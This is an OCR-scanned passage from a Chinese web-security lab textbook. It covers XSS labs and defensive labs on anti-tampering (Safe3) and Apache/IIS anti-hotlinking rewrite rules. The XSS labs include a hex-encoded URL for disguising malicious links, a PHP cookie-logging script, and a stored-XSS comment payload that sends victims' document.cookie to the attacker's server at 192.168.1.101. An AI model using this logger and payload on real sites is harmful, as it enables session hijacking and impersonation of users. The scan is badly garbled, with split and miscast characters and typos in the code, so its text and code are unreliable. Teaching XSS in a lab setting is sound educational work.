G) 当然 ， 这 些 地 址 很 容易 引起 用 户 的 怀疑 ， 要 想 欺 骗 用 户 去 单 击 这 些 地 址 ， 则 可 
以 将 地 址 转换 为 十 六 进 制 的 形式 。 例 如 可 以 将 http://192.168.1.101/xss.php?name= 
«script»alert(" XSS")«/script^ 4t Jj. http://192.168.1.101/xss.php?name=%3C%73%63% 
72% 69%70%74%3E%6 1 %6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73% 
63%72%69%70%74%3E, 也 能 得 到 相同 的 效果 。 这 样 产生 的 地 址 就 具有 了 一 定 的 隐蔽 性 。 


【实验 报告 】 
(1) 详细 叙述 实验 过 程 ， 分 析 跨 站 脚本 攻击 的 原理 和 危害 。 
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(2) 分 析 如 何 检测 跨 站 脚本 漏洞 的 存在 。 


【思考 题 】 
除了 本 实验 中 的 方式 之 外 ， 还 有 哪些 途径 可 以 进行 跨 站 脚本 攻击 ? 


14.2.2 ”通过 跨 站 脚本 攻击 获取 用 户 Cookie 


【实验 目的 】 
了 解 如 何 通过 跨 站 脚本 攻击 获取 用 户 Cookie. 


【原理 简介 】 

现在 各 种 Web 应 用 在 人 们 的 日 常生 活 中 起 到 了 重要 的 作用 , 其 中 都 包含 大 量 的 动态 
内 容 以 提高 用 户 体验 ， 如 论坛 、 博 客 、 社 交 网 络 、 微 博 等 ， 而 这 些 Web 应 用 中 都 或 多 或 
少 地 存在 跨 站 脚本 漏洞 ， 从 而 导致 恶意 用 户 非法 获取 合法 用 户 的 相关 资料 权限 等 。 通 过 
跨 站 脚本 攻击 , 攻击 者 可 以 达到 诸多 目的 。 其 中 比较 重要 的 一 个 就 是 获取 用 户 的 Cookie, 
从 而 能 冒充 某 些 用 户 ， 甚 至 提升 自己 的 权限 。 

来 自 应 用 安全 国际 组 织 OWASP 的 建议 ,对 XSS 最 佳 的 防护 应 该 结合 以 下 两 种 方法 : 
验证 所 有 输入 数据 ， 有 效 检测 攻击 ;对 所 有 输出 数据 进行 适当 的 编码 ， 以 防止 任何 已 成 
功 注 入 的 脚本 在 浏览 器 端 运 行 。 

本 实验 针对 一 个 较 早 版 本 的 WordPress 进行 跨 站 脚本 攻击 。 产 生 这 个 攻击 的 原因 是 


系统 对 管理 员 输 入 的 评论 信息 没有 进行 验证 和 过 滤 ， 因 此 管理 员 可 以 通过 评论 进行 跨 站 
脚本 攻击 。 
【实验 环境 】 


本 地 计算 机 上 需 装 有 Web 浏览 器 ;远程 计算 机 (假设 IP 地 址 为 192.168.1.101) 上 
运行 WordPress 3.0.1 或 更 低 版 本 。 


【实验 步 又 】 
(1) 在 服务 器 上 新 建 一 个 PHP 文件 ， 输 入 如 下 代码 : 


<?php 

$cookie = $ GET['cookie']; 

$ip = getenv ('REMOTE ADDR'); 

$referer-getenv ('HTTP REFERER'); 

$agent - $ SERVER['HTTP USER AGENT']; 

$fp = fopen('cookie.txt', 'a'); 

fwrite($fp," IP: " .$ip. "\n User Agent:".S$agent."\n Referer:". $referer. 
"An Cookie: ".$cookie."\n\n\n"); 

fclose($fp); 

Ta 


将 文件 命名 为 recordcookie.php, 并 放 在 服务 器 的 根 目 录 下 。 建立 这 个 PHP 文件 的 目 
的 是 ， 在 跨 站 脚本 攻击 时 ， 通 过 调用 这 个 PHP 文件 来 记录 用 户 的 信息 。 
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(2) 打开 浏览 器 ， 以 管理 员 身份 登录 WordPress， 在 任意 一 篇 文章 中 的 评论 里 加 入 
“<script>document write('<img src="http:/192.168.1.101/recordcookie.php?cookie='+document. 
cookie+" width=0 height=0 border=0”, 如 图 14-16 所 示 。 然 后 提交 该 评论 。 


留 下 回复 
以 admin 登 录 。 退出， 


«script»document.write('«img sro="http://192.168.1.101 
/recordcookie.php?cookie='+document.cookie+" width=0 height=0 border=0 
/»'y«e/sctipt» 


FA 14-16 输入 跨 站 攻击 脚本 
(3) 让 其 他 用 户 登 录 并 访问 这 条 评论 ， 如 图 14-17 所 示 。 


admin 说 ; 
2011 年 07 月 27 日 于 10:28 上 午 


留 下 回复 
以 author 登 录 。 退出 ， 


图 14-17 ”访问 存在 跨 站 脚本 攻击 的 页 面 
(4) 在 地 址 栏 中 输入 “http://192.168.1.101/cookie.txt”, 可 以 看 到 刚才 author 的 Cookie 
等 相关 信息 被 记录 下 来 ， 如 图 14-18 所 示 。 这 里 应 该 注意 到 ， 当 author 访问 有 跨 站 脚本 
的 页 面 时， 很 难 察觉 到 有 任何 异常 。 


http://192.168.1.101/cookie.txt 下 


合 [L] http://192.168.1.101/cookie.txt -je 


IP: 192.168.1.104 

User Agent:Mozilla/5.0 (Xll; Linux i686; rv:5.0) Gecko/20100101 Firefo: 
Referer: http://192.168.1.101/wordpress/?p-1 

Cookie: wp-settings-time-4-1311684518; wp-settings-time-6-1311685009; v 


图 14-18 ”路 站 脚本 攻击 的 结果 


【实验 报告 】 
(1) 详细 叙述 实验 过 程 ， 分 析 这 个 跨 站 脚本 漏洞 产生 的 原因 及 解决 方法 。 
(2) 分 析 如 何 通过 跨 站 脚本 攻击 达到 冒充 用 户 的 目的 。 


【思考 题 】 
根据 实验 结果 ， 分 析 如 何 防止 和 发 现 跨 站 脚本 攻击 。 
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143 网 页 防 算 改 技术 


【实验 目的 】 
了 解 网 页 防 自 改 技术 的 基本 原理 ， 掌 握 用 防 算 改 规则 保护 网 站 。 


【原理 简介 】 

网 站 在 信息 发 展 中 起 到 了 重要 的 作用 ， 已 经 渗透 到 了 当今 社会 的 各 个 角落 。 网 站 的 
地 位 也 得 到 了 空前 的 提高 ， 对 一 个 企业 和 一 个 政府 机 构 来 说 ， 网 站 无 异 于 自己 的 门面 。 
虽然 目前 已 有 防火 墙 、 入 侵 检测 等 安全 防范 手段 , 但 各 类 Web 应 用 系统 的 复杂 性 和 多 样 
性 导致 系统 漏洞 层出不穷 、 防 不 胜 防 ， 黑 客 入 侵 和 复 改 页 面 的 事件 时 有 发 生 。 针 对 这 些 
情况 ， 网 页 防臭 改 系 统 应 运 而 生 。 经 过 多 年 的 发 展 ， 网 页 防 算 改 系统 采用 的 技术 也 在 不 
断 地 发 展 和 更 新 ， 到 目前 为 止 ， 网 页 防 算 改 技术 已 经 发 展 到 了 第 三 代 。 

1. 网 页 被 算 改 的 原因 和 特点 

黑客 强烈 的 表现 和 欲望， 国内 外 非法 组 织 的 不 法 企图 ， 商 业 竞争 对 手 的 恶意 攻击 ， 不 
满 情绪 离职 员工 的 发 泄 等 都 将 导致 网 页 被 自 改 。 网 页 自 改 攻击 事件 具有 以 下 特点 : BE 
网 站 页 面 传播 速度 快 、 阅 读 人 群 多 ， 复制 容 易 ， 事 后 消除 影响 难 ， 预 先 检查 和 实时 防范 
较 难 ， 网 络 环境 复杂 难以 追查 责任 ， 攻 击 工具 简单 且 向 智能 化 趋势 发 展 。 

2. 网 页 防 算 改 技术 的 发 展 历程 

1) (起 始点 ) 人 工 对 比 检测 

人 工 对 比 检测 其 实 就 是 一 种 专门 指派 网 络 管理 人 员 ， 人 工 监控 需要 保护 的 网 站 ， 一 
旦 发 现 被 算 改 ， 然 后 以 人 力 对 其 修改 还 原 的 手段 。 严 格 地 说 ， 人 工 对 比 检测 不 能 算是 一 
种 网 页 防 自 改 系统 采用 的 技术 ， 而 只 能 算是 一 种 原始 的 应 对 网 页 被 算 改 的 手段 。 但 是 其 
在 网 页 防 自 改 的 技术 发 展 历程 中 存在 一 段 相 当 的 时 间 ， 所 以 在 这 里 把 它 作为 网 页 防 自 改 
技术 发 展 的 起 始点 。 

这 种 手段 非常 原始 且 效 果 不 佳 ， 且 不 说 人 力 成 本 较 高 ， 其 最 致命 的 缺陷 在 于 人 力 监 
控 不 能 达到 即时 性 , 也 就 是 不 能 在 第 一 时 间 发 现 网 页 被 算 改 也 不 能 在 第 一 时 间 做 出 还 原 ， 
当 管 理 人 员 发 现 网 页 被 算 改 再 做 还 原 时 ， 被 算 改 的 网 页 已 在 互联 网 存在 了 一 段 时 间 ， 可 
能 已 经 被 一 定数 量 的 网 民 浏览 。 

2) (第 一 代 ) 时 间 轮 询 技术 

时 间 轮 询 技术 〈 也 可 称 为 “外 挂 轮 询 技术 ”)。 在 这 里 将 其 称 为 网 页 防 自 改 技术 的 第 
一 代 。 从 这 一 代 开 始 ， 网 页 防 篡改 技术 已 经 摆脱 了 以 人 力 检测 恢复 为 主体 的 原始 手段 而 
作为 一 种 自动 化 的 技术 形式 出 现 。 

时 间 轮 询 技术 是 利用 一 个 网 页 检测 程序 ， 以 轮 询 方式 读 出 要 监控 的 网 页 ， 与 真实 网 
页 相 比较 ， 来 判断 网 页 内 容 的 完整 性 ， 对 于 被 算 改 的 网 页 进行 报警 和 恢复 。 但 是 ， 采 用 
时 间 轮 询 式 的 网 页 防 自 改 系统 ， 对 每 个 网 页 来 说 ， 轮 询 扫描 存在 着 时 间 间 隔 ， 一 般 为 数 
十 分 钟 ， 在 这 数 十 分 钟 的 间隔 中 ， 黑 客 可 以 攻击 系统 并 使 访问 者 访问 到 被 自 改 的 网 页 。 
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此 类 应 用 在 过 去 网 页 访问 量 较 少 、 具 体 网 页 应 用 较 少 的 情况 下 适用 ， 目 前 网 站 页 面 通常 
少 则 上 百 页 ， 检 测 轮 询 时 间 更 长 ， 且 占用 系统 资源 较 大 ， 该 技术 逐渐 被 淘汰 。 

3) (第 三 代 ) 事件 触发 技术 和 核心 内 嵌 技 术 

在 这 里 将 事件 触发 技术 与 核心 内 冉 技 术 两 种 技术 放 在 同一 代 来 说 ， 因 为 这 两 种 网 页 
防 自 改 技术 出 现 的 时 间 差 距 不 大 ， 而 且 两 种 技术 常常 被 结合 使 用 。 所 谓 核 心 内 哎 技 术 ， 
即 密码 水 印 技术 ， 最 初 先 将 网 页 内 容 采取 非 对 称 加 密 存放 ， 在 外 来 访问 请 求 时 将 经 过 加 
密 验 证 过 的 ， 进 行 解密 对 外 发 布 ， 若 未 经 过 验证 ， 则 拒绝 对 外 发 布 ， 调 用 备份 网 站 文件 
进行 验证 解密 后 对 外 发 布 。 此 种 技术 通常 要 结合 事件 触发 机 制 对 文件 的 部 分 属性 进行 对 
比 ， 如 大 小 、 页 面 生成 时 间 等 做 判断 ， 无 法 更 准确 地 进行 其 他 属性 的 判断 。 其 最 大 的 特 
点 就 是 安全 性 相对 外 挂 轮 询 技术 安全 性 大 大 提高 ， 但 不 足 是 加 密 计 算 会 占用 大 量 服务 器 
资源 ， 系 统 反映 较 慢 。 

核心 内 婴 技 术 就 避免 了 时 间 轮 询 技 术 的 轮 询 间隔 这 个 缺点 ， 但 是 由 于 这 种 技术 是 对 
每 个 流出 网 页 都 进行 完整 检查 ， 占 用 巨大 的 系统 资源 ， 给 服务 器 造成 较 大 负载 。 且 对 网 
页 正常 发 布 流程 做 了 更 改 ， 整 个 网 站 需要 重新 架构 ， 增 加 新 的 发 布 服务 器 替代 原先 的 服 
务 器 。 随 着 技术 发 展 以 及 网 上 各 类 应 用 的 增多 ， 对 服务 器 的 负载 资源 可 以 用 “苛刻 ” 来 
形容 ， 任 何 占用 服务 器 资源 的 部 分 都 要 淘汰 ， 来 确保 网 站 的 高 访问 效率 ， 如 此 一 来 ， 内 
据 技 术 《〈 即 密码 技术 ) 最 终 将 被 淘汰 。 

4)〈 第 三 代 ) 文件 过 滤 驱 动 技术 + 事件 触发 技术 

文件 过 滤 驱 动 技术 最 初 应 用 于 军 方 和 保密 系统 , 作为 文件 保护 技术 和 各 类 审计 技术 ， 
甚至 被 一 些 狭 猎 好 事 者 应 用 于 “流氓 软件 ”， 该 技术 可 以 说 是 让 人 喜忧参半 。 在 网 页 防 自 
改 技术 革新 当中 ， 该 技术 找到 了 其 发 展 的 空间 。 与 事件 触发 技术 结合 ， 形 成 了 今天 的 第 
三 代 网 页 防 自 改 保护 技术 。 其 原理 是 : 将 算 改 监测 的 核心 程序 通过 微软 文件 底层 驱动 技 
术 应 用 到 Web 服务 器 中 ， 通 过 事件 触发 方式 进行 自动 监测 ， 对 文件 夹 的 所 有 文件 内 容 ， 
对 照 其 底层 文件 属性 ， 经 过 内 置 散 列 快速 算法 ， 实 时 进行 监测 ， 若 发 现 属性 变更 ， 则 通 
过 非 协议 方式 、 纯 文件 安全 拷贝 方式 将 备份 路 径 文件 夹 内 容 复 制 到 监测 文件 夹 相应 文件 
位 置 ， 通 过 底层 文件 驱动 技术 ， 整 个 文件 复制 过 程 为 毫秒 级 ， 使 得 公众 无 法 看 到 被 算 改 
页 面 ， 其 运行 性 能 和 检测 实时 性 都 达到 最 高 的 水 准 。 

页 面 防 算 改 模块 采用 Web 服务 器 底层 文件 过 滤 驱 动 级 保护 技术 , 与 操作 系统 紧密 结 
合 ， 所 监测 的 文件 类 型 不 限 ， 可 以 是 一 个 HTML 文件 也 可 以 是 一 段 动 态 代 码 ， 执 行 准确 
率 高 。 这 样 做 不 仅 完 全 杜绝 了 轮 询 扫 描 式 页 面 防 自 改 软件 的 扫描 间隔 中 被 算 改 内 容 被 用 
户 访问 的 可 能 ， 其 所 消耗 的 内 存 和 CPU 占用 率 也 远 远 低 于 文件 轮 询 扫描 式 或 核心 内 桥 
式 的 同类 软件 ， 可 以 说 是 一 种 简单 、 高 效 、 安 全 性 又 极 高 的 防 自 改 技术 。 

【实验 环境 】 

Windows 2003, Safe3 网 页 防 自 改 系统 。 

【实验 步骤 】 

(1) 安装 Safe3 网 页 防 算 改 系统 。 

(2) 运行 Safe3 网 页 防 算 改 系统 ， 输 入 登录 密码 (默认 为 admin)， 如 图 14-19 所 示 。 
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G) 在 【保护 对 象 】 中 添加 一 个 文件 , 如 “C:\Inetpub\wwwroot\index.asp ”如 图 14-20 


所 示 。 
sg 网 页 防 等 M 企 业 版 ve_3--http:7ymm 
E EN 四 排除 进程 ME 
保护 规则 
C:\Inetpub\wwwroot\index. asp 
s; 登录 x 
z [E:Ntnetpub\wreroot\inder. asp ] 
Do 
图 14-19 ”登录 Safe3 网 页 防 算 图 14-20 ”添加 保护 规则 
改 系统 管理 界面 
(4) 打开 受 保护 文件 所 在 的 文件 夹 ， 对 这 个 文件 进行 修改 或 重 命名 等 操作 ， 观 察 操 
作 的 结果 ， 如 图 14-21 所 示 。 
lol xi 
| 4r 


KFE) ”编辑 下) me RUD IRW Bop 


四 让 -加 -中 | > RAR | 应 > XX 19 | m 

Hist ©) [3 c:\Inetpub\wwer oot EJ esl 

二 
A 


1 KB ASP 文件 2011-8-10 10:35 


HOSUR SS xj 


Q TREAZ index: FRAN. 
E 


4 
图 14-21 ”尝试 算 改 被 保护 的 文件 
上 通配符 保护 更 多 的 文件 ， 如 “C:\Inetpub\wwwroot\*.asp*” 


(5) 使 月 


【实验 报告 】 
CD 详细 描述 实验 过 程 ， 分 析 Safe3 网 页 防 自 改 系统 是 如 何 防 自 改 的 。 
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(2) 分 析 Safe3 网 页 防 自 改 系统 中 保护 对 象 、 排 除 对 象 和 排除 进程 的 功能 及 在 什么 
情况 下 使 用 。 


【思考 题 】 
添加 何 种 规则 组 合 可 以 完整 保护 整个 网 站 而 且 保 证 功能 正常 ? 


^44 ”防盗 链 技术 


14.4.1 Apache 服务 器 防盗 链 


【实验 目的 】 
掌握 Apache 服务 器 防盗 链 的 基本 原理 与 方法 。 
【原理 简介 】 


所 谓 盗 链 ， 是 指 服务 器 上 提供 的 内 容 并 不 保存 自己 的 服务 器 上 ， 而 是 保存 在 其 他 的 
服务 器 中 ， 并 且 对 于 最 终 用 户 来 说 ， 并 不 知道 这 些 内 容 来 自 其 他 的 服务 器 。 

一 般 浏 览 时 ， 一 个 完整 的 页 面 并 不 是 一 次 全 部 传送 到 客户 端的 。 如 果 浏 览 器 请 求 的 
是 一 个 带 有 许多 图 片 和 其 他 信息 的 页 面 ， 则 最 先 传送 回来 的 是 这 个 页 面 的 文本 。 通 过 客 
户 端的 浏览 器 对 这 段 文本 的 解释 执行 ,发现 其 中 还 有 图 片 , 则 浏览 器 会 再 发 送 一 条 HTTP 
请 求 ， 就 这 样 一 个 完整 的 页 面 也 许 要 经 过 发 送 多 条 HTTP 请 求 才 能 够 被 完整 地 显示 。 基 
于 这 样 的 机 制 ， 就 会 产生 一 个 问题 ， 那 就 是 盗 链 问题 : 就 是 一 个 网 站 中 如 果 没 有 起 始 页 
面 中 所 说 的 信息 ， 例 如 图 片 信息 ， 那 么 它 完全 可 以 将 这 个 图 片 链接 到 别 的 网 站 。 这 样 没 
有 任何 资源 的 网 站 利用 了 别 的 网 站 的 资源 来 展示 给 浏览 者 ， 提 高 了 自己 的 访问 量 ， 而 大 
部 分 浏览 者 又 不 会 很 容易 地 发 现 ， 这 样 显然 对 于 那个 被 利用 了 资源 的 网 站 是 不 公平 的 。 
一 些 不 良 网 站 为 了 不 增加 成 本 而 扩充 自己 站 点 的 内 容 ， 经 常 盗用 其 他 网 站 的 链接 ， 既 损 
害 了 原 网 站 的 合法 利益 ， 也 加 重 了 原 网 站 服务 器 的 负担 。 

在 HTTP 中 ,有 一 个 表 头 字段 叫 referer, 采用 URL 的 格式 来 表示 从 哪儿 链接 到 当前 
的 网 页 或 文件 。 换 句 话 说， 通过 referer， 网 站 可 以 检测 目标 网 页 访问 的 来 源 网 页 ， 如 果 
是 资源 文件 ， 则 可 以 跟踪 到 显示 它 的 网 页 地 址 。 有 了 referer 跟踪 来 源 ， 就 可 以 通过 技术 
手段 来 进行 处 理 ， 一 旦 检测 到 来 源 不 是 本 站 即 进行 阻止 或 者 返回 指定 的 页 面 。 这 就 是 一 
种 常见 的 防盗 链 思想 。 

Apache 一 种 广泛 使 用 的 开源 HTTP 服务 器 ， 利 用 其 中 的 rewrite 模块 可 以 轻松 地 实 
现 防盗 链 功能 ， 其 原理 正 是 上 面 所 说 的 ， 通 过 检查 referer 字段 来 判断 对 内 容 的 请 求 是 否 
来 自 自 己 的 服务 器 。 


【实验 环境 】 

Web 浏览 器 与 相应 的 HTTP 分 析 器 CIE 浏览 器 用 户 可 以 使 用 HttpWatch, Firefox 浏 
览 器 用 户 可 以 使 用 HttpFox), Apache 2.2 服务 器 (两 人 为 一 组 ， 假 设 本 机 IP 地 址 为 
192.168.1.101， 对 方 IP 地 址 为 192.168.1.104). 
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【实验 步骤 】 

C1) 在 本 地 服务 器 的 根 目录 下 放置 两 张 图 片 ， 假 设 用 于 访问 的 图 片 为 ok.jpg， 用 于 
防盗 链 的 图 片 为 errorpng。 在 对 方 服 务 器 的 根 目 录 下 新 建 一 个 简单 的 HTML 文件 ， 假 设 
文件 名 为 pic.html， 文 件 中 输入 “<img sre="http://192.168.1.101/ok.jpg" >". 之 后 的 步骤 
均 在 本 机 完成 。 

(2) 打开 Web 浏览 器 ， 启 动 HTTP 分 析 器 ， 如 图 14-22 所 示 ， 并 开始 记录 HTTP 

G) 在 地 址 栏 中 输入 “http://192.168.1.104/pic.html1”， 可 以 看 到 这 个 网 页 的 效果 ， 如 
图 14-23 所 示 。 可 以 看 到 ， 网 页 上 显示 了 被 盗 链 的 图 片 。 


http: //192. 168. 1. 104/pic. html + 
了 nttp://192, 168. 1. 104/pi c. html 
u. 
LT 

T Ctrl+ 丁 

附加 组 件 (A) Ctrl+ShifttA 

设置 同步 QD)… -B 4- 

错误 控制 台 C) CtrltShiftttJ | LCT | 

图 14-22 JAZ HTTP 分 析 器 图 14-23 ”图片 被 次 链 


(4) 查看 HTTP 分 析 器 的 内 容 ， 如 图 14-24 所 示 。 可 以 看 到 浏览 器 先 请 求 
http://192.168.1.104/pic.html， 然 后 请 求 http://192.168.1.101/ok.jpg， 主 机 192.168.1.101 能 
通过 referer 字段 知道 这 个 请 求 的 来 源 是 http://192.168.1.104/pic.html。 


2) HttpFox 


Autoscroll 
Received Method Result Type URL 
200 text/html http: /; 04/pic. html 
00:00:10. +++ 359 5887 Gi 200 image/jpeg http://192. 1-1. 101/ok. jpg 


Headers | Cookies |Query String| POST Data Content 


Request Her Value | Response He Value | 
Host 182. 168. 1. 101 A| | Gtatus-Line) HITP/1.1 200 OK ^| 
User-Agent Mozilla/S.0 (Windows NT 5.1; … | Date Fri, 05 Aug 2011 12:02:53 GUT 
Accept image/png, image/*;q-0.B,*/*;qr- — | Server Apache/2.2.19 (Win32) 
Accept-Lang*+ zh-en, zh; q=0.5 Last-Modified Fri, 05 Aug 2011 11:14:55 GAT 
Accept-Enco-- grip, deflate Etag "3000000000b555- 1626-4 9c0350--- 
Accept-Char-++ GB2312, ut £-8; q=0. 7, #: q-0. T Accept-Ranges bytes 
Keep-Alive — 115 Centent-Len… 5670 

| 


Connection keep-alive Keep-Alive timeout-5, max-100 


Referer http: //192. 188. 1.104/sic.htal| Y (Connection Keen-Alive s 
图 14-24 ” 盗 链 的 过 程 
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(5) 打开 Apache 配置 文件 httpd.conf， 开 局 rewrite 模块 ， 如 图 14-25 所 示 ， 并 在 配 
置 文件 的 最 后 添加 rewrite 规则 ， 如 图 14-26 所 示 。 此 后 ， 再 重启 服务 器 。 


RewriteEngine On 

RewriteCond %{HTTP_REFERER} !“http://192.168.1.101/.*$ [NC] 
RewriteCond %{HTTP_REFERER} !^http://192.168.1.101$ [NC] 
RewriteRule .*\.(jpg)$ http://192.168.1.101/error.png [R,NC] 


117 #LoadModule reqtimeout module modules/mod reqtimeout.so 
115  LoadModule rewrite module modules/mod rewrite. sd 
119  LoadModule setenvif module modules/mod setenvif.so 


图 14-25 在 httpd.conf 中 开启 rewrite 模块 


RewriteEngine On 

RewriteCond *{HTTP_REFERER} !^http://192.168.1.101/.*$ [NC] 
RewriteCond *{HTTP_REFERER} !^http://192.168.1.101$ [NC] 
RewriteRule .*\.(jpg)$ http://192.168.1.101/error.png [R,NC] 


图 14-26 在 httpd.conf 中 加 入 rewrite 规则 

(6) 清空 浏览 器 缓存 , 重新 进行 第 2、 第 3 步 , 可 以 看 到 这 个 网 页 的 效果 , 如 图 14-27 
所 示 。 可 以 看 到 ， 图 片 盗 链 没有 成 功 。 u 

(7) 查看 HTTP 分 析 器 的 内 容 ， 如 图 14-28 所 示 。 he eds Le 
可 以 看 到 ， 浏 览 器 对 http://192.168. 1.101/okjpg 的 请 A e882 188 tome 
求 被 重 定向 到 了 http://192.168.1.101/error.png。 

【实验 报告 】 

详细 描述 实验 过 程 , 分 析 Apache 服务 器 防盗 链 的 
原理 和 rewrite 模块 工作 的 详细 过 程 。 

(242) 

(1) 分 析 这 种 防盗 链 方式 的 优 缺 点 。 图 14.27 Vet" 

(2) 实现 防止 文件 下 载 次 链 。 


14.4.2 IIS 服务 器 防盗 链 


【实验 目的 】 
掌握 IIS 服务 器 防盗 链 的 基本 原理 与 方法 。 
【原理 简介 】 


IIS 是 微软 开发 的 Web 服务 器 ， 操 作 简 单方 便 。IIS 本 身 没有 提供 类 似 于 Apache 中 
的 rewrite 的 功能 ， 但 可 以 通过 第 三 方 插件 来 实现 。 本 实验 通过 ISAPI Rewrite 这 个 插件 
来 实现 Apache 中 rewrite 模块 的 功能 ， 从 而 用 相同 的 方式 实现 防盗 链 功能 。 

防盗 链 的 原理 依然 是 通过 检查 referer 字段 ， 若 发 现 对 内 容 的 请 求 不 是 来 源 于 本 服务 
器 ， 则 重 定向 到 其 他 的 内 容 。 
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2) Htt pF ox 


D Start q Autoscroll 


Started i Received Method Result Type 
200 text/html 


Headers |Cookies|Query String| POST Data) Content 


Request He Value Response … Value 
Host 192, 168. 1. 101 (Status-Line) HITP/1.1 302 Found 

User-Agent Mozilla/S.0 (Windows NT 5.1; = Date Fri, 05 Aug 2011 12:12:50 GMT 
Accept image/png, inage/*; q-0. 8, #/*; q Server Apsche/2.2.19 (Win32) 
Accept-Lange zh-en, zh; q=0.5 
Accept-Enco gzip, deflate Content-Len 214 

Accept-Char+++ GB2312, ut£-8; q=0. T, *; q=0.7 Keep-Alive timeout=5, max=100 

Keep-Alive — 115 Connection Keep-Alive 

keep-alive Content-Type text/html; charset-iso-8859-1 
”| 


Connection 
Referer htto://192. 168. 1. 104/nic. html 


图 14-28 ”防盗 链 的 过 程 


【实验 环境 】 

Web 浏览 器 与 相应 的 HTTP 分 析 器 (IE 浏览 器 用 户 可 以 使 用 HttpWatch，Firefox 浏 
览 器 用 户 可 以 使 用 HttpFox)，IIS 5.1 服务 器 (两 人 为 一 组 ， 假 设 本 机 IP 地 址 为 
192.168.1.101， 对 方 IP 地 址 为 192.168.1.104)，ISAPI Rewrite3. 


【实验 步骤 】 

(1) 在 本 地 服务 器 的 根 目 录 下 放置 两 张 图 片 ， 假 设 用 于 访问 的 图 片 为 okjpg， 用 于 
防盗 链 的 图 片 为 error.png。 在 对 方 服务 器 的 根 目录 下 新 建 一 个 简单 的 HTML 文件 ， 假 设 
文件 名 为 pic.html， 文 件 中 输入 “<img sre="http://192.168.1.101/0k.jpg" >". 之 后 的 步骤 


均 在 本 机 完成 。 http: //192. 168. 1. 104/j html lt 
ic. htm. 
(2) 打开 Web 浏览 器 ， 启 动 HTTP 分 析 器 , 并 开 “一 
始 id = HTTP 数据 €)» | http: //192. 168. 1, 104/pic. html 
HIK lo 


(3) 在 地 址 栏 中 输入 “http:/192.168.1.104/ pic. 
html”， 可 以 看 到 这 个 网 页 的 效果 ， 如 图 14-29 所 示 。 
可 以 看 到 ， 网 页 上 显示 了 被 盗 链 的 图 片 。 

(4) 查看 HTTP 分 析 器 的 内 容 ， 如 图 14-30 所 示 。 
可 以 看 到 浏览 器 先 请 求 http://192. 168.1.104/pic.html, 
然后 请 求 http://192.168.1.101/okjpg， 主 机 192.168. 
1.101 能 通过 referer 字段 知道 这 个 请 求 的 来 源 是 图 14.29 图 片 被 资 链 
http://192.168.1.104/pic.html. 

(5) 下 载 并 安装 ISAPI Rewrite3， 如 图 14-31 所 示 。 
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2) HttpFox 


Autoscroll 
Received Method Result Type WL 
325 GET text/html http 


Headers |Cookies Query String| POST Data] Content. 


Response … | Value 

192. 168. 1. 101 (Status-Line) HITP/1.1 200 OK 
[User-Agent  Mozilla/5.0 Windows NT 5.1; … — | Server Wicrosoft-IIS/S. 1 
[Accept image/png, inage/*: q=0. 8, #/#; qe | | [Date Fri, 05 Aug 2011 12:25:10 GUT 
|Accept-Lang--+ zh-en, zh; q=0.5 Content-Type image/jpeg 
Accept-Encom grip, deflate Accept-Ranges bytes 
|Aceept-Char'… GB2312, ut£-8; q70. T, *; 420.7 LastModified Fri, 05 Aug 2011 11:14:55 GUT 
[Keep-Alive — 115 Etag “808155e76053cel:97a" 
[Connection keep-alive Content-Lens*+ 5870 
Referer Rito: //192.168.1.104/pic him] “| 


图 14-30” 资 链 的 过 程 


i@ Helicon ISAPI Rewrite 3 Setup 


Updating System 
The features you selected are currently being installed. 


Copying new files. 
File: RegexTestexe 


Directory: C:\Program Files\Helicon\ISAPI_Reewwite3\ 
Size: 603816 


_—k = —  ]à]72ÓD 


Time remaining: 1 minutes 


Wise Installation Wizard? 


图 14-31. 安装 ISAPI Rewrite3 


(6) 打开 ISAPI Rewrite3 安装 目录 下 的 配置 文件 httpd.conf， 添 加 rewrite 规则 : 


RewriteEngine On 

RewriteCond %{HTTP_REFERER} !“http://192.168.1.101/.*$ [NC] 
RewriteCond %{HTTP_REFERER} !“http://192.168.1.101$ [NC] 
RewriteRule .*\.(jpg)$ http://192.168.1.101/error.png [O,NC] 


如 图 14-32 所 示 。 此 后 ， 再 重启 服务 器 。 
CD) 清空 浏览 器 缓存 , 重新 进行 第 2、 第 3 步 , 可 以 看 到 这 个 网 页 的 效果 , 如 图 14-33 


所 示 。 可 以 看 到 ， 图 片 盗 链 没 有 成 功 。 
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1 RewriteEngine On 

2 RewriteCond $(HTTP REFERER) !^http://192.168.1.101/.*$ [NC] 
> RewriteCond *{HTTP_REFERER} !^http://192.168.1.101$ [NC] 

4 RewriteRule .*Y.(jpg)$ http://192.168.1.101/error.png [O,NC] 


图 14-32 在 httpd.conf 中 加 入 rewrite 规则 


[T] http://192. 168. 1. 104/pi c. html T 


L| http: //192. 168. 1. 104/pic. html 


图 14-33 ” 盗 链 失败 


(8) 查看 HTTP 分 析 器 的 内 容 , 如 图 14-34 所 示 。 可 以 看 到 , 浏览 器 将 http://192.168. 
1.101/ok.jpg 请 求 中 的 资源 重 定向 到 了 http://192.168.1.101/error.png。 


3) HttpFox 


D Start k Autoscroll 
Started Received Method Result Type URL [3 
"- 325 GET 200 text/html http: //192. 1---104/pic. html 
1498 GET 200 image/png http://192. 1-1. 101/0k. jpe 


Headers |Cookies| Query String) POST Data|Content 


Request Hew: Value Response He Value 
Host 192. 168. 1. 101 A| | Gtatus-Line) KITP/1.1 200 OK 
User-Agent — Morilla/S.O (Windows NT 5.1; … | Server Microsoft-II5/5.1 


Accept image/png, image/*; q=0.8, */*:q | | [Content-Loc http://182, 168. 1- 1017error png 


Accept-Lang zh-cn, zh; q-0.5 Date Fri, 05 Aug 2011 12:39:57 GMT 


Accept-Enco- gzip, deflate Content-Type image/png 

Accept-Char*** GB2312, ut £-8; q=0. T, *; q=0. 7 Accept-Ranges bytes 

Keep-Alive 115 Last-Modified Fri, 05 Aug 2011 11:18:39 GMT 
Connection keep-alive Etag “8011498c6153cc1:9b5" 
Referer http: //192. 163.1. 104/nic. html — V [Content-Len--+ 1293 


图 14-34 ”防盗 链 的 过 程 


【实验 报告 】 
详细 描述 实验 过 程 , 分 析 LIS 服务 器 防盗 链 的 原理 和 ISAPI Rewrite 插件 工作 的 详细 
【思考 题 】 

分 析 这 个 实验 和 上 个 实验 中 ， 服 务 器 的 响应 有 何 区 别 以 及 造成 这 种 区 别 的 原 
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45 ” 单 点 登录 技术 


【实验 目的 】 
掌握 单 点 登录 的 基本 原理 与 方法 。 


【原理 简介 】 

单 点 登录 (Single Sign On, SSO) 是 目前 比较 流行 的 企业 业务 整合 的 解决 方案 之 一 。 
